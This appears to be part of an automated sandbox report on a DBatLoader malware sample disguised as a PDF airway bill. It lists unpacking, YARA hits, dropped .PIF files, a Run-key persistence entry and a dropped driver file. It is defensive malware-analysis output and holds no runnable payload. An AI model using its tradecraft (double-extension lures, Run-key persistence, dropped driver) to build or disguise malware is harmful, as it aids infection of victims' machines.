                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\proquota.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeStatic file information: File size 1364480 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WQzLddwiZR.exe, 00000011.00000000.2545685733.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000013.00000002.3368381118.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000015.00000000.2752944866.000000000081E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: hdcleziT.pif, 00000005.00000003.2447031738.0000000024928000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000003.2481886824.0000000024AD8000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024E1E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: hdcleziT.pif, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021742000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021771000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\Libraries\hdcleziT.pifUnpacked PE file: 5.2.hdcleziT.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\hdcleziT.pifUnpacked PE file: 11.2.hdcleziT.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\hdcleziT.pifUnpacked PE file: 15.2.hdcleziT.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.22c67a8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Tizelcdh.PIF.22265a8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.22c67a8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Tizelcdh.PIF.22265a8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.2b20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2231702231.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2191756371.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2342771726.0000000002226000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: hdcleziT.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B38798
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B4C2FC push 02B4C367h; ret 0_2_02B4C35F
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B232FC push eax; ret 0_2_02B23338
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2635A push 02B263B7h; ret 0_2_02B263AF
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2635C push 02B263B7h; ret 0_2_02B263AF
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B4C0AC push 02B4C125h; ret 0_2_02B4C11D
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B4C1F8 push 02B4C288h; ret 0_2_02B4C280
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B4C144 push 02B4C1ECh; ret 0_2_02B4C1E4
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B386B8 push 02B386FAh; ret 0_2_02B386F2
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B26736 push 02B2677Ah; ret 0_2_02B26772
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B26738 push 02B2677Ah; ret 0_2_02B26772
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2C4EC push ecx; mov dword ptr [esp], edx0_2_02B2C4F1
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3E5AC push ecx; mov dword ptr [esp], edx0_2_02B3E5B1
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2D520 push 02B2D54Ch; ret 0_2_02B2D544
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2CA82 push 02B2CCF2h; ret 0_2_02B2CCEA
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B4BB64 push 02B4BD8Ch; ret 0_2_02B4BD84
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2CB6C push 02B2CCF2h; ret 0_2_02B2CCEA
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3788C push 02B37909h; ret 0_2_02B37901
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B368C6 push 02B36973h; ret 0_2_02B3696B
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B368C8 push 02B36973h; ret 0_2_02B3696B
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B38910 push 02B38948h; ret 0_2_02B38940
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3A917 push 02B3A950h; ret 0_2_02B3A948
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3A918 push 02B3A950h; ret 0_2_02B3A948
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3890E push 02B38948h; ret 0_2_02B38940
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B32EE0 push 02B32F56h; ret 0_2_02B32F4E
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B32FEB push 02B33039h; ret 0_2_02B33031
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B32FEC push 02B33039h; ret 0_2_02B33031
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B35DFC push ecx; mov dword ptr [esp], edx0_2_02B35DFE
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004148B6 pushad ; retn 9DA8h5_2_00414987
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_0040D99D push esp; iretd 5_2_0040D99E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_004182B8 push 0000005Bh; iretd 5_2_004182BA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_00416373 push ds; iretd 5_2_00416372

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: C:\Users\Public\Libraries\hdcleziT.pifJump to dropped file
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: C:\Users\Public\Libraries\Tizelcdh.PIFJump to dropped file
                      Sample is not signed and drops a device driver
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: \airway bill details - delivery receipt contact form no_45987165927 ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: \airway bill details - delivery receipt contact form no_45987165927 ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: \airway bill details - delivery receipt contact form no_45987165927 ,pdf.scr.exeJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: \airway bill details - delivery receipt contact form no_45987165927 ,pdf.scr.exeJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: C:\Users\Public\Libraries\hdcleziT.pifJump to dropped file
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: C:\Users\Public\Libraries\Tizelcdh.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TizelcdhJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TizelcdhJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B3A954
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
